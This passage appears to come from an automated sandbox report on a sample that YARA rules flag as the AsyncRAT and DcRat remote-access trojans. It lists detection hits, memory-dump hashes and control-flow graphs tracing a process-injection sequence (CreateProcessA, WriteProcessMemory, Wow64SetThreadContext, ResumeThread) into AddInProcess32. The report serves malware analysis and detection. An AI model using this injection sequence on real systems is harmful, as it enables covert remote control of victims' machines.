                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000005.00000002.2700013071.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000005.00000002.2700013071.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000005.00000002.2712121235.0000000005398000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000005.00000002.2712121235.00000000052C0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_DcRat_2, Description: Yara detected DcRat, Source: 00000005.00000002.2703147210.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000005.00000002.2703147210.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        Reputation:moderate
                                        Has exited:false

                                        Reset < >
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1553419954.00007FF887970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887970000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff887970000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                          • Instruction ID: 56101d1bee6593b43126e127c5d813310b3b99ea396b6416542ef275276a1907
                                          • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                          • Instruction Fuzzy Hash: 1401A77011CB0D4FD744EF0CE455AA6B3E0FB85360F10052DE58AC3691D636E882CB42
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1553419954.00007FF887970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887970000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff887970000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (0}$8,}$p0}$/}
                                          • API String ID: 0-404723380
                                          • Opcode ID: 87caa165137c0d3151bee548c54b9244cf5f2ecd19e08d237ec6fd5dab35c334
                                          • Instruction ID: 459580bfa7c9596875b6c73744f643f68fc4651ad2d225238597022f274a46ca
                                          • Opcode Fuzzy Hash: 87caa165137c0d3151bee548c54b9244cf5f2ecd19e08d237ec6fd5dab35c334
                                          • Instruction Fuzzy Hash: C0319352C4E6C24FE7168A781C2E17D6E71BF136C0B5904FBC0998B1DBE80D9D26C352

                                          Execution Graph

                                          Execution Coverage:3.2%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:0%
                                          Total number of Nodes:12
                                          Total number of Limit Nodes:0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1533578477.00007FF887A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ff887a50000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: H$P*j$r6`$r6`
                                          • API String ID: 0-3526753565
                                          • Opcode ID: 2037d9724648bbb5513644dc7eb4136494950274be28012944474afb02829cf0
                                          • Instruction ID: 93e9cd2bb930a781750c332a033aca03293e65c323377f547ce89766afff2819
                                          • Opcode Fuzzy Hash: 2037d9724648bbb5513644dc7eb4136494950274be28012944474afb02829cf0
                                          • Instruction Fuzzy Hash: 37C22531A4DBC98FE7969A7858962BA7BF2FF56360B1801FBC05DC7193D918AC05C342

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 410 7ff88799268d-7ff887992768 414 7ff88799276a-7ff887992789 410->414 415 7ff8879927dd-7ff88799281c 410->415 414->415 420 7ff88799278b-7ff887992795 414->420 418 7ff887992891-7ff88799292b 415->418 419 7ff88799281e-7ff88799283d 415->419 429 7ff8879929a0-7ff887992af4 CreateProcessA 418->429 430 7ff88799292d-7ff88799294c 418->430 419->418 427 7ff88799283f-7ff887992849 419->427 421 7ff887992797-7ff8879927aa 420->421 422 7ff8879927cf-7ff8879927d7 420->422 424 7ff8879927ac 421->424 425 7ff8879927ae-7ff8879927c1 421->425 422->415 424->425 425->425 428 7ff8879927c3-7ff8879927cb 425->428 431 7ff887992883-7ff88799288b 427->431 432 7ff88799284b-7ff88799285e 427->432 428->422 448 7ff887992af6 429->448 449 7ff887992afc-7ff887992bef call 7ff887992c0b 429->449 430->429 437 7ff88799294e-7ff887992958 430->437 431->418 433 7ff887992860 432->433 434 7ff887992862-7ff887992875 432->434 433->434 434->434 438 7ff887992877-7ff88799287f 434->438 440 7ff887992992-7ff88799299a 437->440 441 7ff88799295a-7ff88799296d 437->441 438->431 440->429 442 7ff887992971-7ff887992984 441->442 443 7ff88799296f 441->443 442->442 445 7ff887992986-7ff88799298e 442->445 443->442 445->440 448->449 461 7ff887992bf1 449->461 462 7ff887992bf6-7ff887992c0a 449->462 461->462
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1533094360.00007FF887980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887980000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ff887980000_powershell.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID: M K$M K
                                          • API String ID: 963392458-1972991516
                                          • Opcode ID: 5f0ea2803612e52cc1bc57c76b393fe45789a8c066eb179ff8bd34ab08d4625e
                                          • Instruction ID: e3c3046e28c20e16f440631c38e9f4bfeb175f7f4539a0646e6530c6ec007df3
                                          • Opcode Fuzzy Hash: 5f0ea2803612e52cc1bc57c76b393fe45789a8c066eb179ff8bd34ab08d4625e
                                          • Instruction Fuzzy Hash: 27F14030918A8E8FEBB8DF18CC597E977E1FB59351F10412AD84DD7291DB78AA80CB41

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 463 7ff88799216d-7ff887992179 464 7ff887992184-7ff88799223c 463->464 465 7ff88799217b-7ff887992183 463->465 468 7ff887992264-7ff8879922f6 WriteProcessMemory 464->468 469 7ff88799223e-7ff887992261 464->469 465->464 471 7ff8879922f8 468->471 472 7ff8879922fe-7ff88799236c 468->472 469->468 471->472
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1533094360.00007FF887980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887980000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ff887980000_powershell.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: c1940d41523ab19422bd8f2a4449d66673f95f37937ae509d6e421b7c4dec4c6
                                          • Instruction ID: 87961460293ba5f108885c4d9df43acd675d14136cba06b2f7d41c7686cc0309
                                          • Opcode Fuzzy Hash: c1940d41523ab19422bd8f2a4449d66673f95f37937ae509d6e421b7c4dec4c6
                                          • Instruction Fuzzy Hash: 43611830918A5D8FDB98DF58C884BE9BBF1FB69315F1082AAD44DE3251CB34A985CF40

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 475 7ff887991e15-7ff887991e21 476 7ff887991e23-7ff887991e2b 475->476 477 7ff887991e2c-7ff887991ed2 475->477 476->477 481 7ff887991ef4-7ff887991f56 Wow64SetThreadContext 477->481 482 7ff887991ed4-7ff887991ef1 477->482 484 7ff887991f58 481->484 485 7ff887991f5e-7ff887991fb4 481->485 482->481 484->485
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1533094360.00007FF887980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887980000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ff887980000_powershell.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 1742037e8dc504c41b5b27af2cba297a7e1591ba48fd79fdb53995b4539ce14d
                                          • Instruction ID: 0a93a28fab88cd11aaba3a4da9d25c8166c59d18b41e1dfdf5ca4a8be950ae4c
                                          • Opcode Fuzzy Hash: 1742037e8dc504c41b5b27af2cba297a7e1591ba48fd79fdb53995b4539ce14d
                                          • Instruction Fuzzy Hash: F5514970D08A5D8FEB54DFA8C849BEDBBF1FB65311F10826AD049E7252DB74A885CB40

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 488 7ff887991cbd-7ff887991cc9 489 7ff887991cd4-7ff887991ce3 488->489 490 7ff887991ccb-7ff887991cd3 488->490 491 7ff887991ce5-7ff887991ced 489->491 492 7ff887991cee-7ff887991dc0 ResumeThread 489->492 490->489 491->492 497 7ff887991dc2 492->497 498 7ff887991dc8-7ff887991e12 492->498 497->498
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1533094360.00007FF887980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887980000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ff887980000_powershell.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: d8409ffc0090348be353d2a630cc7a46da516f0e6703982842efbc6487fd751d
                                          • Instruction ID: 25a47c93d7f33288f6ab17f3ce235c581cdfb32601c52873f176d389d5286e6e
                                          • Opcode Fuzzy Hash: d8409ffc0090348be353d2a630cc7a46da516f0e6703982842efbc6487fd751d
                                          • Instruction Fuzzy Hash: E2515C30D0868D8FDB55DFA8C885BEDBBB0FF56310F1441AAD449D7292DA74A845CB41

                                          Control-flow Graph

                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1533578477.00007FF887A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ff887a50000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9bc40990f2597659343f5f712b0b0a2e45906234bdb9e3c69260ad5ec3f7b993
                                          • Instruction ID: fef47f9b72a2fb667d816a58169e7a9234e51e36aa17ad7d6533300eb842e940
                                          • Opcode Fuzzy Hash: 9bc40990f2597659343f5f712b0b0a2e45906234bdb9e3c69260ad5ec3f7b993
                                          • Instruction Fuzzy Hash: 0F612522E4EEC74FF7A5D6A814162BD66E3FF556A0B5801BEC04EC75D2ED0EA804C742

                                          Control-flow Graph

                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1533578477.00007FF887A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ff887a50000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2463150b01335a229c83e4f66bd93d3f9aa06f24c68fb07aaf44acf7ddb9c42c
                                          • Instruction ID: c658f647a7e05fa07a060778d3df74c99fd33210d2b46e376131137e2ee0b937
                                          • Opcode Fuzzy Hash: 2463150b01335a229c83e4f66bd93d3f9aa06f24c68fb07aaf44acf7ddb9c42c
                                          • Instruction Fuzzy Hash: A841F522E8EEC74FF2A5D6A804572BD56E3FF956A0B5C01B9C44DC79D2DC0EA844C643
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1533094360.00007FF887980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887980000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ff887980000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: r6`
                                          • API String ID: 0-2522635671
                                          • Opcode ID: b2372d183a59c62c3a60e4e6514a6571fd98c4c47bf30ca1803976a7eb82b836
                                          • Instruction ID: 5fa816119a2ba795bfe42759477fec9ca64eed4cf4d7980bfca61faaea210c90
                                          • Opcode Fuzzy Hash: b2372d183a59c62c3a60e4e6514a6571fd98c4c47bf30ca1803976a7eb82b836
                                          • Instruction Fuzzy Hash: C122FA70D0465E8FDB18DF98C895AEDBBB2FF88340F14866DD42AAB346CA346845CF54
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1533094360.00007FF887980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887980000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ff887980000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 5O_^
                                          • API String ID: 0-747053082
                                          • Opcode ID: 8cb62bb6aaa7c2321fe85c8a98861438a965ff7b44665a8e329c9c9f10c4d883
                                          • Instruction ID: d0fced81b33f2cce564ace41c47fe768193b6896961c0d7e792ddb48ae39d977
                                          • Opcode Fuzzy Hash: 8cb62bb6aaa7c2321fe85c8a98861438a965ff7b44665a8e329c9c9f10c4d883
                                          • Instruction Fuzzy Hash: 51A16067D9D6D39AF3339A2D5CAA0E83F70FF526A471940F7C4958E193ED2C280AC251
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1533094360.00007FF887980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887980000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ff887980000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1df9df48a1ddd0339b55029168b2378d01b77afb57f32aebf90035ab71b177f7
                                          • Instruction ID: bba868cc470c7836d0cf2090fd610e735e3a692245513c92d7dd84014043364f
                                          • Opcode Fuzzy Hash: 1df9df48a1ddd0339b55029168b2378d01b77afb57f32aebf90035ab71b177f7
                                          • Instruction Fuzzy Hash: 5051236288E7C24FE7138B708C656947FB0AF17264B4E05EBC4D0CF0A3E65D5A5AC322

                                          Execution Graph

                                          Execution Coverage:16.6%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:0%
                                          Total number of Nodes:24
                                          Total number of Limit Nodes:1
                                          execution_graph 8095 1012080 8096 10120ca LoadLibraryA 8095->8096 8098 1012123 8096->8098 8099 10109e0 8100 1010a02 8099->8100 8103 1011ef1 8100->8103 8101 1010adc 8105 1011f18 8103->8105 8104 1011f39 8104->8101 8105->8104 8109 1012390 8105->8109 8114 10123a0 8105->8114 8106 1011f5b 8106->8101 8110 10123c0 8109->8110 8111 1012432 8110->8111 8119 10122d4 8110->8119 8123 10122d8 8110->8123 8111->8106 8115 10123c0 8114->8115 8116 1012432 8115->8116 8117 10122d4 VirtualProtect 8115->8117 8118 10122d8 VirtualProtect 8115->8118 8116->8106 8117->8116 8118->8116 8120 1012320 VirtualProtect 8119->8120 8122 101235b 8120->8122 8122->8111 8124 1012320 VirtualProtect 8123->8124 8126 101235b 8124->8126 8126->8111

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 140 1012074-1012121 LoadLibraryA 143 1012123-1012129 140->143 144 101212a-1012179 140->144 143->144 150 1012183 144->150 151 101217b 144->151 152 1012184 150->152 151->150 152->152
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2700903028.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_1010000_AddInProcess32.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: c35b98993c2c1e09a957246933555b4adfb72c7915b14080aa6542c5e4010fd6
                                          • Instruction ID: ca5265bd709d1e5b741f11ce31d756d9f160208495bfded0b9652900cbe5a104
                                          • Opcode Fuzzy Hash: c35b98993c2c1e09a957246933555b4adfb72c7915b14080aa6542c5e4010fd6
                                          • Instruction Fuzzy Hash: ED31E0B4D01248DFDB14CFA9D584BDDBBF1AF48310F24806AE409AB368DBB96945CF90

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 153 1012080-1012121 LoadLibraryA 156 1012123-1012129 153->156 157 101212a-1012179 153->157 156->157 163 1012183 157->163 164 101217b 157->164 165 1012184 163->165 164->163 165->165
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2700903028.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_1010000_AddInProcess32.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 48b619373ef91f0990924d8c9b7d5ab1a53fb014ea3a76286a76628da2016432
                                          • Instruction ID: f832f1f9046efb75d90ef91a2825e9c572c7dcb088ecde5854ee2a2f9efa9f17
                                          • Opcode Fuzzy Hash: 48b619373ef91f0990924d8c9b7d5ab1a53fb014ea3a76286a76628da2016432
                                          • Instruction Fuzzy Hash: 2F31F1B4D01248EFDB14CFA9D584BCDBBF5AF48310F24806AE408BB358DBB96945CB90

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 166 10122d4-1012359 VirtualProtect 169 1012362-1012387 166->169 170 101235b-1012361 166->170 170->169
                                          APIs
                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 0101234C
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2700903028.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_1010000_AddInProcess32.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 330707ad392f4b56395bddae884364a03bc080c75b23dadbfc7d9e86e4797610
                                          • Instruction ID: 28570f039686cadf6cfa631e28e61b78bc08d24bb33cbcbfee5d4ba4807f4291
                                          • Opcode Fuzzy Hash: 330707ad392f4b56395bddae884364a03bc080c75b23dadbfc7d9e86e4797610
                                          • Instruction Fuzzy Hash: D22124B1D003499FDB10DFAAC484BEEFBF4EF48220F14842AD859A7250C7799A40CFA1

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 174 10122d8-1012359 VirtualProtect 177 1012362-1012387 174->177 178 101235b-1012361 174->178 178->177
                                          APIs
                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 0101234C
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2700903028.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_1010000_AddInProcess32.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 1fa81e5c24849610c0d9b8ae7a89dc238a83417753ba2b772538122be9f9c1f8
                                          • Instruction ID: b8668710248f36c98eea68e89e9efc7c9a30d2405cf3c6255caef1f955b80138
                                          • Opcode Fuzzy Hash: 1fa81e5c24849610c0d9b8ae7a89dc238a83417753ba2b772538122be9f9c1f8
                                          • Instruction Fuzzy Hash: 7911F2B19003499FDB10DFAAC884BEEFBF4EF48220F14842AD559A7250C779A944CFA1